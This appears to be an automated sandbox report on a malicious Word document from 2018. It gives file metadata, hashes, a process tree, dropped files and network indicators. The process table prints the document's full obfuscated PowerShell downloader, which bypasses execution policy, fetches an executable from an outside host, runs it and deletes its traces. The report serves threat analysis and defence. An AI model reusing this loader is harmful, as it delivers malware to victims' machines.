File name: | f42d6e4509b7a47d5c944e40aa8ff916765699f100d00ec4fb97ba151c42e9bc |
Full analysis: | https://app.any.run/tasks/7ab677f2-bccf-4d4b-9bb1-d37e8720ea64 |
Verdict: | Malicious activity |
Analysis date: | November 14, 2018, 11:51:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Monique Paccot-Brandt, Number of Characters: 265932, Create Time/Date: Wed Nov 7 11:34:08 2018, Last Saved Time/Date: Wed Nov 7 11:34:08 2018, Security: 0, Keywords: sunt, fuga, dolor, Last Saved By: Monique Paccot-Brandt, Revision Number: 849387, Subject: Rabais N909475675, Template: Normal, Title: Rabais N909475675, Total Editing Time: 03:00, Number of Words: 29548, Number of Pages: 85, Comments: Quas deserunt doloribus ea fugiat soluta numquam. |
MD5: | 4F9AEBCC68A32E59B69BC2EF53D6004E |
SHA1: | 0D31CC82284E28A13D3B0742D1DB7725987872B9 |
SHA256: | F42D6E4509B7A47D5C944E40AA8FF916765699F100D00EC4FB97BA151C42E9BC |
SSDEEP: | 6144:AEJjQddifG/eDeSfnugIzppCBG/Ao9eYXpTwkHm:Auudifk5Sfipx0eDHm |
.doc | | | Microsoft Word document (33.9) |
---|
Category: | laborum |
---|---|
Manager: | Noah Grosjean |
Company: | Vienne Bonvini SA |
Slides: | -2147483648 |
Notes: | -2147483648 |
Lines: | 813 |
HiddenSlides: | -2147483648 |
Bytes: | -2147483648 |
Paragraphs: | 91 |
Comments: | Quas deserunt doloribus ea fugiat soluta numquam. |
Pages: | 85 |
Words: | 29548 |
TotalEditTime: | 3.0 minutes |
Title: | Rabais N909475675 |
Template: | Normal |
Subject: | Rabais N909475675 |
RevisionNumber: | 849387 |
LastModifiedBy: | Monique Paccot-Brandt |
Keywords: | sunt, fuga, dolor |
Security: | None |
ModifyDate: | 2018:11:07 11:34:08 |
CreateDate: | 2018:11:07 11:34:08 |
Characters: | 265932 |
Author: | Monique Paccot-Brandt |
Software: | Microsoft Office Word |
CompObjUserType: | Microsoft Office Word 97-2003 Document |
CompObjUserTypeLen: | 39 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
920 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\f42d6e4509b7a47d5c944e40aa8ff916765699f100d00ec4fb97ba151c42e9bc.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2256 | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe $chxgjuiy='iyjflpdx.';$xjmxaf=' Pro';$lyepvac='nPol';$miiecld='exe'')';$iljgju='$hj = ''hw';$nxcswau='se -force';$udsy='e-';$ivxyoe='yste';$vyxfo='-Object S';$fagpnwa='m.Net.W';$ccxou='h); Start';$yzmva='dFile(''';$uclekne='icy By';$uuvn='https:/';$rxsjoe0='ooku.us/w';$enro5='env:';$evcyxzcc='ope';$bcun='Item (f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$ezpbjfu='temp + ''\';$iey=') -recur';$wpebnbxy1='ss -Sc';$omxfuoa='cess; $p';$xemxu='hfhj'';';$bdfdea='ath;Remov';$uuyuw='ss $p';$iwknjz1='uyvqsd';$eggjnq='ath=($env';$uueou15='lc.';$uiu='p-content';$nhfjwlcxs0='.Downl';$oljkdaht='ebclient)';$xpeiija='Executio';$immcpyin='/images';$eeblv=';(New';$ehqzt05='ecg''';$elplpda='/theme';$kpei='oa';$hdueo='belleza';$dlmcu=';';$fdve='-Proce';$wruqogv9='s/';$wjeegr='/b';$glpe=':temp+''\s';$jdiyh='exe'',$pat';$ibqeu='Set-';$aiygyo='/f';$ouuain='pa'; Invoke-Expression ($iljgju+$xemxu+$ibqeu+$xpeiija+$lyepvac+$uclekne+$ouuain+$wpebnbxy1+$evcyxzcc+$xjmxaf+$omxfuoa+$eggjnq+$glpe+$chxgjuiy+$miiecld+$eeblv+$vyxfo+$ivxyoe+$fagpnwa+$oljkdaht+$nhfjwlcxs0+$kpei+$yzmva+$uuvn+$wjeegr+$rxsjoe0+$uiu+$elplpda+$wruqogv9+$hdueo+$immcpyin+$aiygyo+$uueou15+$jdiyh+$ccxou+$fdve+$uuyuw+$bdfdea+$udsy+$bcun+$enro5+$ezpbjfu+$iwknjz1+$ehqzt05+$iey+$nxcswau+$dlmcu); | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\uhpgyr.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA5A2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\DotNetTypes.format.ps1xml | xml | |
MD5:1AB2FD4B6749AD6831C86411FDCAFB48 | SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:A84B6952AB6A297CCE6C085FA8AB06CB | SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$2d6e4509b7a47d5c944e40aa8ff916765699f100d00ec4fb97ba151c42e9bc.doc | pgc | |
MD5:2264F9171C9E444FCE0B7BDC23BAC127 | SHA256:F46705D7041937616AFFE6FC0AE1B8C782F1CDAE6A323F6CDB830DC5882BB789 | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:256A3EF47ED32A3D3038855D49DF0319 | SHA256:151B56C71BC28DD4D752808CE3A9352E96D9FA381320511F87B327A8208F5DD0 | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_aliases.help.txt | text | |
MD5:DCCDE3D3FA7A378DAB091D3B78E393CB | SHA256:5DD570CAA907247BAC82B722B453619ADC88063C238B294154939481C134B140 | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_command_precedence.help.txt | text | |
MD5:9B204318B2747400638FE5028E376100 | SHA256:A79D0811C03FEB6129802426F53799CBA1A93C4BD204CE33E55BC180D3F0F132 | |||
920 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\uyvqsdecg\en-US\about_CommonParameters.help.txt | text | |
MD5:BD04B34656EDF637080E5B39AC179450 | SHA256:5AA4D407219915FB2F87FAC21E309E9933CC98B6394A3B3D4873F5C139C48DA1 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2256 | uhpgyr.exe | 31.186.83.114:443 | booku.us | ATM S.A. | PL | unknown |
Domain | IP | Reputation |
---|---|---|
booku.us |
| unknown |